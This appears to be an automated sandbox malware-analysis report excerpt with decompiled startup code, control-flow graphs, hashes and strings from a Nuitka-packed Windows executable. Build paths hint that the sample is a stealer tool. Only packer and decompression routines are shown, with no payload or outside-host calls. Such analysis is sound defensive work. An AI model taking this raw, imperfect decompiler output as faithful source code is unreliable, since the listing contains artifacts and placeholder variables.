                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert$File$puts$_wcsicmp$ErrorFormatLastMessagePointermalloc$CreateRead$ConsoleCtrlDirectoryHandlerModuleName_putwsabort
                                                                                                                                                                • String ID: %TEMP%\onefile_%PID%_%TIME%$A$C:\Users\user\AppData\Local\Temp\\onefile_6828_133380419975826539\lib2to3\PatternGrammar3.9.10.final.0.pickle$C:\Users\user\AppData\Local\Temp\\onefile_6828_133380419975826539\test.exe$Error, couldn't runtime expand temporary directory pattern:$Error, failed to access unpacked executable.$Error, failed to locate onefile filename.$Error, failed to open '%ls' for writing.$Error, failed to register signal handler.$K$NUITKA_ONEFILE_PARENT$Y$bool_res$dctx != NULL$h$header[0] == 'K'$header[1] == 'A'$header[2] == 'Y'$input.src$output.dst$read_size == size$res != INVALID_SET_FILE_POINTER$static_src\OnefileBootstrap.c
                                                                                                                                                                • API String ID: 744075496-1582612310
                                                                                                                                                                • Opcode ID: 414c670b492e4177598348cf41a1ed05a591f45dafb3f4d0dd0dd20609068bcc
                                                                                                                                                                • Instruction ID: a14fe6a1412863909f9cdff3acdb236635e569fb62c6e85c8c4f2b38795099ef
                                                                                                                                                                • Opcode Fuzzy Hash: 414c670b492e4177598348cf41a1ed05a591f45dafb3f4d0dd0dd20609068bcc
                                                                                                                                                                • Instruction Fuzzy Hash: 354270B5714A41C5EB249F12F9543AA3770FB80B88F845126EF8D477A4EB7CCA89C709
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 145 40114b-40118a call 4259a0 148 40118c-401196 145->148 149 40119f-4011cc 145->149 148->149 150 4011ef-401224 149->150 151 401226-401232 150->151 152 4011ce-4011d6 150->152 155 401240-40124b 151->155 156 401234-40123e _amsg_exit 151->156 153 4011e1-4011e6 152->153 154 4011d8-4011df 152->154 153->150 154->151 158 40124d-40126d _initterm 155->158 159 40126f 155->159 157 401279-401285 156->157 160 4012a7-4012ab 157->160 161 401287-4012a1 _initterm 157->161 158->157 159->157 162 4012cc-4012d9 160->162 163 4012ad-4012cb 160->163 161->160 164 4012f7-401349 call 41f66e call 426140 call 41ef10 call 4262b0 162->164 165 4012db-4012f0 162->165 163->162 175 4013b1-4013bc 164->175 176 40134b 164->176 165->164 177 4013be-4013c9 175->177 178 4013df-401438 call 401576 call 41ec84 call 41eb80 175->178 179 40136a-401373 176->179 182 4013d4 177->182 183 4013cb-4013d2 177->183 199 401447-40144f 178->199 200 40143a-401442 exit 178->200 180 401375-40137e 179->180 181 40134d-401356 179->181 185 401380-401384 180->185 186 40138d-401396 180->186 188 401365 181->188 189 401358-401362 181->189 187 4013d9 182->187 183->187 185->181 191 401386 185->191 192 4013a3-4013ae 186->192 193 401398-4013a1 186->193 187->178 188->179 189->188 191->186 192->175 193->192 196 401388 193->196 196->186 201 401451 _cexit 199->201 202 401456-401464 199->202 200->199 201->202
                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                			E0040114B(void* __r8) {
                                                                                                                                                                				long long _v16;
                                                                                                                                                                				signed long long _v20;
                                                                                                                                                                				long long _v24;
                                                                                                                                                                				void* _v32;
                                                                                                                                                                				long long _v40;
                                                                                                                                                                				long long _v44;
                                                                                                                                                                				long long _v56;
                                                                                                                                                                				long long _v64;
                                                                                                                                                                				long long _v72;
                                                                                                                                                                				long long _v80;
                                                                                                                                                                				void* _v88;
                                                                                                                                                                				long long _v96;
                                                                                                                                                                				void* _v136;
                                                                                                                                                                				signed int _v140;
                                                                                                                                                                				char _v200;
                                                                                                                                                                				_Unknown_base(*)()* _t59;
                                                                                                                                                                				void* _t61;
                                                                                                                                                                				signed char _t62;
                                                                                                                                                                				void* _t65;
                                                                                                                                                                				void* _t69;
                                                                                                                                                                				char* _t89;
                                                                                                                                                                				long long _t96;
                                                                                                                                                                				long long* _t99;
                                                                                                                                                                				intOrPtr* _t100;
                                                                                                                                                                				intOrPtr* _t102;
                                                                                                                                                                				intOrPtr* _t104;
                                                                                                                                                                				intOrPtr* _t106;
                                                                                                                                                                				intOrPtr* _t111;
                                                                                                                                                                				intOrPtr _t113;
                                                                                                                                                                				intOrPtr* _t114;
                                                                                                                                                                				long long _t116;
                                                                                                                                                                				intOrPtr _t117;
                                                                                                                                                                				intOrPtr _t118;
                                                                                                                                                                				signed long long _t123;
                                                                                                                                                                				long long _t139;
                                                                                                                                                                				long long* _t142;
                                                                                                                                                                				long long* _t143;
                                                                                                                                                                				void* _t146;
                                                                                                                                                                				signed long long _t147;
                                                                                                                                                                				intOrPtr _t148;
                                                                                                                                                                				intOrPtr _t153;
                                                                                                                                                                				long long* _t159;
                                                                                                                                                                				intOrPtr _t160;
                                                                                                                                                                				long long _t162;
                                                                                                                                                                				intOrPtr _t163;
                                                                                                                                                                				void* _t174;
                                                                                                                                                                
                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                				_t89 =  &_v200;
                                                                                                                                                                				r8d = 0x68;
                                                                                                                                                                				 *(_t89 + 2) =  *(_t89 + 2) & _t147;
                                                                                                                                                                				 *((intOrPtr*)(_t89 - 0x75)) =  *((intOrPtr*)(_t89 - 0x75)) + _t69;
                                                                                                                                                                				if( *((intOrPtr*)(_t89 + 0x29e2a)) != 0) {
                                                                                                                                                                					GetStartupInfoA();
                                                                                                                                                                				}
                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                				_v44 = 0x30;
                                                                                                                                                                				_v56 =  *[gs:rax];
                                                                                                                                                                				_v40 =  *((intOrPtr*)(_v56 + 8));
                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                				while(1) {
                                                                                                                                                                					_t96 =  *0x42aee0; // 0x43fc78
                                                                                                                                                                					_v64 = _t96;
                                                                                                                                                                					_v72 = _v40;
                                                                                                                                                                					_v80 = 0;
                                                                                                                                                                					_t148 = _v72;
                                                                                                                                                                					asm("lock dec eax");
                                                                                                                                                                					_v32 = _v80;
                                                                                                                                                                					if(_v32 == 0) {
                                                                                                                                                                						break;
                                                                                                                                                                					}
                                                                                                                                                                					_t99 = _v32;
                                                                                                                                                                					if(_t99 != _v40) {
                                                                                                                                                                						asm("repne add eax, [eax]");
                                                                                                                                                                						 *_t99();
                                                                                                                                                                						continue;
                                                                                                                                                                					}
                                                                                                                                                                					_v24 = 1;
                                                                                                                                                                					break;
                                                                                                                                                                				}
                                                                                                                                                                				_t100 =  *0x42aef0; // 0x43fc70
                                                                                                                                                                				if( *_t100 != 1) {
                                                                                                                                                                					_t102 =  *0x42aef0; // 0x43fc70
                                                                                                                                                                					if( *_t102 != 0) {
                                                                                                                                                                						 *0x430024 = 1;
                                                                                                                                                                					} else {
                                                                                                                                                                						_t143 =  *0x42aef0; // 0x43fc70
                                                                                                                                                                						 *_t143 = 1;
                                                                                                                                                                						_t148 =  *0x42af30; // 0x441018
                                                                                                                                                                						L00425A20();
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					_t148 = 0x1f;
                                                                                                                                                                				}
                                                                                                                                                                				_t104 =  *0x42aef0; // 0x43fc70
                                                                                                                                                                				if( *_t104 == 1) {
                                                                                                                                                                					_t148 =  *0x42af10; // 0x441000
                                                                                                                                                                					L00425A20();
                                                                                                                                                                					_t142 =  *0x42aef0; // 0x43fc70
                                                                                                                                                                					 *_t142 = 2;
                                                                                                                                                                				}
                                                                                                                                                                				if(_v24 == 0) {
                                                                                                                                                                					_t139 =  *0x42aee0; // 0x43fc78
                                                                                                                                                                					_v88 = _t139;
                                                                                                                                                                					_v96 = 0;
                                                                                                                                                                					 *_v88 = _v96;
                                                                                                                                                                				}
                                                                                                                                                                				_t106 =  *0x42ae20; // 0x42a7a8
                                                                                                                                                                				if( *_t106 != 0) {
                                                                                                                                                                					r8d = 0;
                                                                                                                                                                					dil = dil + dil;
                                                                                                                                                                				}
                                                                                                                                                                				E0041F66E(_t69, _t146, _t148, _t174);
                                                                                                                                                                				_t59 = SetUnhandledExceptionFilter(??);
                                                                                                                                                                				_t159 =  *0x42aea0; // 0x43f1d0
                                                                                                                                                                				 *_t159 = SetUnhandledExceptionFilter;
                                                                                                                                                                				_t61 = E0041EF10(E00426140(_t59, 0x401000));
                                                                                                                                                                				_t160 =  *0x42ae40; // 0x400000
                                                                                                                                                                				 *0x43fc68 = _t160;
                                                                                                                                                                				_t62 = E004262B0(_t61);
                                                                                                                                                                				_v16 =  *0x43fc68;
                                                                                                                                                                				if(_v16 == 0) {
                                                                                                                                                                					L31:
                                                                                                                                                                					_t111 =  *0x42afb0; // 0x43f190
                                                                                                                                                                					if( *_t111 != 0) {
                                                                                                                                                                						if((_v140 & 0x00000001) == 0) {
                                                                                                                                                                							_t123 = 0xa;
                                                                                                                                                                						} else {
                                                                                                                                                                							_t123 = _t62 & 0x0000ffff;
                                                                                                                                                                						}
                                                                                                                                                                						 *0x427000 = _t123;
                                                                                                                                                                					}
                                                                                                                                                                					_t113 =  *0x430004; // 0x1
                                                                                                                                                                					E00401576(_t69, _t113, 0x430008);
                                                                                                                                                                					E0041EC84();
                                                                                                                                                                					_t114 =  *0x42ae60; // 0x440458
                                                                                                                                                                					_t162 =  *0x430010; // 0x1d1a70
                                                                                                                                                                					 *((long long*)( *_t114)) = _t162;
                                                                                                                                                                					_t153 =  *0x430010; // 0x1d1a70
                                                                                                                                                                					_t163 =  *0x430008; // 0x1d17b0
                                                                                                                                                                					_t116 =  *0x430004; // 0x1
                                                                                                                                                                					_t65 = E0041EB80(_t69, _t163, _t153); // executed
                                                                                                                                                                					 *0x43001c = _t116;
                                                                                                                                                                					_t117 =  *0x430020; // 0x0
                                                                                                                                                                					if(_t117 == 0) {
                                                                                                                                                                						exit();
                                                                                                                                                                					}
                                                                                                                                                                					_t118 =  *0x430024; // 0x0
                                                                                                                                                                					if(_t118 == 0) {
                                                                                                                                                                						L00425A30();
                                                                                                                                                                					}
                                                                                                                                                                					return _t65;
                                                                                                                                                                				} else {
                                                                                                                                                                					L23:
                                                                                                                                                                					while(1) {
                                                                                                                                                                						if(_t62 > 0x20) {
                                                                                                                                                                							L20:
                                                                                                                                                                							if(_t62 == 0x22) {
                                                                                                                                                                								_t62 = _t62 & 0xffffff00 | _v20 == 0x00000000;
                                                                                                                                                                								_v20 = _t62 & 0x000000ff;
                                                                                                                                                                							}
                                                                                                                                                                							_v16 = _v16 + 1;
                                                                                                                                                                							continue;
                                                                                                                                                                						}
                                                                                                                                                                						if(_t62 == 0) {
                                                                                                                                                                							L28:
                                                                                                                                                                							while(_t62 != 0 && _t62 <= 0x20) {
                                                                                                                                                                								_v16 = _v16 + 1;
                                                                                                                                                                							}
                                                                                                                                                                							 *0x43fc60 = _v16;
                                                                                                                                                                							goto L31;
                                                                                                                                                                						}
                                                                                                                                                                						if(_v20 != 0) {
                                                                                                                                                                							goto L20;
                                                                                                                                                                						}
                                                                                                                                                                						goto L28;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                			}

















































                                                                                                                                                                0x00401156
                                                                                                                                                                0x0040115e
                                                                                                                                                                0x00401165
                                                                                                                                                                0x0040116c
                                                                                                                                                                0x0040117b
                                                                                                                                                                0x0040117e
                                                                                                                                                                0x0040118a
                                                                                                                                                                0x0040119d
                                                                                                                                                                0x0040119d
                                                                                                                                                                0x0040119f
                                                                                                                                                                0x004011a7
                                                                                                                                                                0x004011b5
                                                                                                                                                                0x004011c1
                                                                                                                                                                0x004011c5
                                                                                                                                                                0x004011ef
                                                                                                                                                                0x004011ef
                                                                                                                                                                0x004011f6
                                                                                                                                                                0x004011fe
                                                                                                                                                                0x00401202
                                                                                                                                                                0x0040120a
                                                                                                                                                                0x00401216
                                                                                                                                                                0x0040121b
                                                                                                                                                                0x00401224
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004011ce
                                                                                                                                                                0x004011d6
                                                                                                                                                                0x004011ea
                                                                                                                                                                0x004011ed
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004011ed
                                                                                                                                                                0x004011d8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004011d8
                                                                                                                                                                0x00401226
                                                                                                                                                                0x00401232
                                                                                                                                                                0x00401240
                                                                                                                                                                0x0040124b
                                                                                                                                                                0x0040126f
                                                                                                                                                                0x0040124d
                                                                                                                                                                0x0040124d
                                                                                                                                                                0x00401254
                                                                                                                                                                0x00401261
                                                                                                                                                                0x00401268
                                                                                                                                                                0x00401268
                                                                                                                                                                0x00401234
                                                                                                                                                                0x00401234
                                                                                                                                                                0x0040123f
                                                                                                                                                                0x00401279
                                                                                                                                                                0x00401285
                                                                                                                                                                0x0040128e
                                                                                                                                                                0x00401295
                                                                                                                                                                0x0040129a
                                                                                                                                                                0x004012a1
                                                                                                                                                                0x004012a1
                                                                                                                                                                0x004012ab
                                                                                                                                                                0x004012ad
                                                                                                                                                                0x004012b4
                                                                                                                                                                0x004012b8
                                                                                                                                                                0x004012c8
                                                                                                                                                                0x004012cb
                                                                                                                                                                0x004012cc
                                                                                                                                                                0x004012d9
                                                                                                                                                                0x004012e5
                                                                                                                                                                0x004012f4
                                                                                                                                                                0x004012f6
                                                                                                                                                                0x004012f7
                                                                                                                                                                0x0040130a
                                                                                                                                                                0x0040130c
                                                                                                                                                                0x00401313
                                                                                                                                                                0x00401322
                                                                                                                                                                0x0040132e
                                                                                                                                                                0x00401335
                                                                                                                                                                0x00401338
                                                                                                                                                                0x00401340
                                                                                                                                                                0x00401349
                                                                                                                                                                0x004013b1
                                                                                                                                                                0x004013b1
                                                                                                                                                                0x004013bc
                                                                                                                                                                0x004013c9
                                                                                                                                                                0x004013d4
                                                                                                                                                                0x004013cb
                                                                                                                                                                0x004013cf
                                                                                                                                                                0x004013cf
                                                                                                                                                                0x004013d9
                                                                                                                                                                0x004013d9
                                                                                                                                                                0x004013df
                                                                                                                                                                0x004013ee
                                                                                                                                                                0x004013f3
                                                                                                                                                                0x004013f8
                                                                                                                                                                0x00401402
                                                                                                                                                                0x00401409
                                                                                                                                                                0x0040140c
                                                                                                                                                                0x00401413
                                                                                                                                                                0x0040141a
                                                                                                                                                                0x00401425
                                                                                                                                                                0x0040142a
                                                                                                                                                                0x00401430
                                                                                                                                                                0x00401438
                                                                                                                                                                0x00401442
                                                                                                                                                                0x00401442
                                                                                                                                                                0x00401447
                                                                                                                                                                0x0040144f
                                                                                                                                                                0x00401451
                                                                                                                                                                0x00401451
                                                                                                                                                                0x00401464
                                                                                                                                                                0x0040134b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040136a
                                                                                                                                                                0x00401373
                                                                                                                                                                0x0040134d
                                                                                                                                                                0x00401356
                                                                                                                                                                0x0040135c
                                                                                                                                                                0x00401362
                                                                                                                                                                0x00401362
                                                                                                                                                                0x00401365
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00401365
                                                                                                                                                                0x0040137e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040138d
                                                                                                                                                                0x00401388
                                                                                                                                                                0x00401388
                                                                                                                                                                0x004013ae
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004013ae
                                                                                                                                                                0x00401384
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00401386
                                                                                                                                                                0x0040136a

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _initterm$_amsg_exit_cexitexit
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 602970348-4108050209
                                                                                                                                                                • Opcode ID: 95c85ffd74f471e3a6c57b785d61bda13fdfcbadebfb8966d4dede3a5d7214a1
                                                                                                                                                                • Instruction ID: feb18f318085db8bd0774120bb760b637bf2ddcdb530bbfed48519118d8c5173
                                                                                                                                                                • Opcode Fuzzy Hash: 95c85ffd74f471e3a6c57b785d61bda13fdfcbadebfb8966d4dede3a5d7214a1
                                                                                                                                                                • Instruction Fuzzy Hash: 70911AB6700B148AFB10CFA6E89036D37B1B348B98F804066DE4CA7BA4DB7DC591C719
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 125 41cd30-41cd6f 126 41cd70-41cd7a 125->126 127 41cd80-41cd97 126->127 128 41ce77-41cea6 memcpy 126->128 130 41cec0-41cedc call 41bfd0 127->130 131 41cd9d-41cda0 127->131 128->126 129 41ceac-41cebf 128->129 135 41cee1-41cefa 130->135 133 41cda2-41cdb6 _assert 131->133 134 41cdbc-41cde4 SetFilePointer 131->134 133->134 134->126 136 41cde6-41cdf0 134->136 137 41cf18-41cf39 _assert 135->137 138 41cefc-41cf10 135->138 139 41cdf2-41cdf8 136->139 140 41cdfd-41ce1e ReadFile 136->140 137->138 138->126 139->140 141 41cf40-41cf54 _assert 140->141 142 41ce24-41ce2b 140->142 143 41ce47-41ce71 142->143 144 41ce2d-41ce41 _assert 142->144 143->127 143->128 144->143
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File_assert$PointerReadmemcpy
                                                                                                                                                                • String ID: !ZSTD_isError(ret)$bool_res$input.size == input.pos$read_size == size$static_src\OnefileBootstrap.c
                                                                                                                                                                • API String ID: 484253220-1931691333
                                                                                                                                                                • Opcode ID: b9ea28d8736a0e5036b4240669dfc799281ea6a91fee214d8acdcdd65b664015
                                                                                                                                                                • Instruction ID: 46ab9e11137d0ef07e86611a1fb98982e15db0f42cf3c2686a69e893392272a6
                                                                                                                                                                • Opcode Fuzzy Hash: b9ea28d8736a0e5036b4240669dfc799281ea6a91fee214d8acdcdd65b664015
                                                                                                                                                                • Instruction Fuzzy Hash: 5D5158B1B50A41C0EB108B2AFD807922361B759B98F84A136DF6C07775DB3CCA89C348
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert$memcpy
                                                                                                                                                                • String ID: *ip <= *op$*op - *ip >= 8$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN)$diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN$dst != NULL$iend >= ip$match >= prefixStart$nbBits < BIT_MASK_SIZE$oLitEnd < oMatchEnd$oLitEnd <= oend_w$oMatchEnd <= oend$ofBits <= MaxOff$op != NULL$op < oMatchEnd$op <= oLitEnd$op <= oMatchEnd$sequence.matchLength >= 1
                                                                                                                                                                • API String ID: 3718630003-2492470846
                                                                                                                                                                • Opcode ID: 2e6dd685fc58eae38ee08dfe6f1cc87013295e9e83047af6310e08f6aa03d75f
                                                                                                                                                                • Instruction ID: 8d56605cce46fe981946306b76697e88c631fad4f9d5bcefb4973dfa5ef7bd3a
                                                                                                                                                                • Opcode Fuzzy Hash: 2e6dd685fc58eae38ee08dfe6f1cc87013295e9e83047af6310e08f6aa03d75f
                                                                                                                                                                • Instruction Fuzzy Hash: 83E26A72B09BC586DA20CF19E44039EB761F384B84F958126DB8D17BA8DF7CD599CB08
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 463 40520b 464 40520e-405212 463->464 465 405213-405226 464->465 466 40525c-40527a memcpy 464->466 467 4053f0-4053f3 465->467 468 40522c-405237 465->468 469 405610-405624 _assert 466->469 470 405280-405283 466->470 467->469 475 4053f9-4053fe 467->475 471 4058f0-4058fa 468->471 472 40523d-405255 468->472 480 405630-405644 _assert 469->480 473 405427-40543b _assert 470->473 474 405289-40528d 470->474 481 405900-405904 471->481 482 404e8b 471->482 476 405718-405723 memcpy 472->476 477 40525b 472->477 490 405450-405458 473->490 478 405293-4052a1 474->478 479 4057e8-4057eb 474->479 475->470 483 405404-405421 _assert 475->483 484 4052f2-4052ff 476->484 477->466 485 405730-40574b _assert 478->485 486 4052a7-4052ab 478->486 488 4057f1-4057f5 479->488 489 405a25-405a39 _assert 479->489 496 405650-40567b _assert 480->496 491 405910-405945 481->491 487 404e92-404ea8 482->487 483->473 483->474 497 405301-405311 484->497 498 40536e-405372 484->498 493 40574e-405762 _assert 485->493 494 405770-405777 486->494 495 4052b1-4052be 486->495 499 4057fb-405815 488->499 500 40598f-4059d0 488->500 501 405a44-405a63 _assert 489->501 490->491 492 40545e-405461 490->492 509 4059f2-405a01 491->509 510 40594b-40595f 491->510 503 405467-405482 492->503 504 40504a-40504c 492->504 493->494 494->493 495->484 506 4052c0-4052cb 495->506 507 405681 496->507 508 4051d6-4051d9 496->508 511 405317-405325 497->511 512 4056e8-405710 497->512 498->487 505 405378-405380 498->505 499->501 502 40581b-40581f 499->502 513 4059d8-4059eb 500->513 529 405a6d-405a71 501->529 502->484 517 405825-405828 502->517 503->504 518 405052-405056 504->518 519 4054b8-4054e3 504->519 520 405386-40539e call 403db0 505->520 521 404f88-404fe7 505->521 515 4052d0-4052f0 506->515 524 405688-4056df call 402510 507->524 522 4055f0-405604 _assert 508->522 523 4051df-4051e4 508->523 514 405961-405969 509->514 510->514 525 405971-405982 510->525 511->498 516 405327-405338 511->516 512->498 513->513 526 4059ed 513->526 514->525 515->484 515->515 531 40533a-405349 516->531 532 40534c-405366 516->532 533 405b4a-405b69 _assert 517->533 534 40582e-405836 517->534 527 4054e9-4054f6 call 403db0 518->527 528 40505c-40506f 518->528 519->527 519->528 520->482 555 4053a4-4053dc 520->555 521->490 530 404fed-404ff1 521->530 522->469 536 4055d0-4055e4 _assert 523->536 537 4051ea-4051ef 523->537 524->484 525->500 526->484 527->528 545 405490-4054ac 528->545 546 405075-40509c 528->546 541 405856-40586d 529->541 542 405a77-405a8a 529->542 530->480 543 404ff7-405042 530->543 531->532 532->498 534->529 544 40583c-405850 _assert 534->544 536->522 548 4055b0-4055c4 _assert 537->548 549 4051f5-405208 537->549 541->513 552 405873-405882 541->552 542->484 551 405a90-405a98 542->551 543->504 544->541 545->519 553 405570-4055a5 546->553 554 4050a2-4050f3 546->554 548->536 549->463 556 405780-405792 549->556 559 405aa0-405ac0 551->559 552->513 560 405888-4058af 552->560 553->548 561 405530-405565 554->561 562 4050f9-405147 554->562 555->467 557 405798-40579c 556->557 558 405b0a-405b48 _assert 556->558 563 4057a2-4057b7 557->563 564 405ac7 557->564 567 405ace-405afd _assert 558->567 559->559 565 405ac2 559->565 568 4058b0-4058c1 560->568 561->553 569 405500-405521 _assert 562->569 570 40514d-4051a9 562->570 563->464 571 4057bd 563->571 564->567 565->484 567->558 568->568 573 4058c3-4058db 568->573 569->561 570->496 574 4051af-4051b1 570->574 575 4057c0-4057dc 571->575 573->484 576 4058e1-4058e9 573->576 574->524 577 4051b7-4051ba 574->577 575->575 578 4057de 575->578 576->484 577->508 579 4051bc-4051d0 _assert 577->579 578->464 579->508
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assertmemcpy
                                                                                                                                                                • String ID: *ip <= *op$*op - *ip >= 8$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN)$diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN$match >= prefixStart$nbBits < BIT_MASK_SIZE$oLitEnd < oMatchEnd$oLitEnd <= oend_w$oMatchEnd <= oend$ofBits <= MaxOff$op != NULL$op < oMatchEnd$op <= oLitEnd$op <= oMatchEnd$sequence.matchLength >= 1
                                                                                                                                                                • API String ID: 1759651462-4012456843
                                                                                                                                                                • Opcode ID: 233f18390672edd70762d55800ad63825b852e518e623b8fb8e7d5dce241fb85
                                                                                                                                                                • Instruction ID: 0ed69338c93c4b102dc8ac02e190f8274cdf5643289fbbd0ef89de8e34b90f77
                                                                                                                                                                • Opcode Fuzzy Hash: 233f18390672edd70762d55800ad63825b852e518e623b8fb8e7d5dce241fb85
                                                                                                                                                                • Instruction Fuzzy Hash: FC429E72705AC586DB20CF19E8443AE7761F385784F84822ADB8D577A9EF3CC599CB08
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
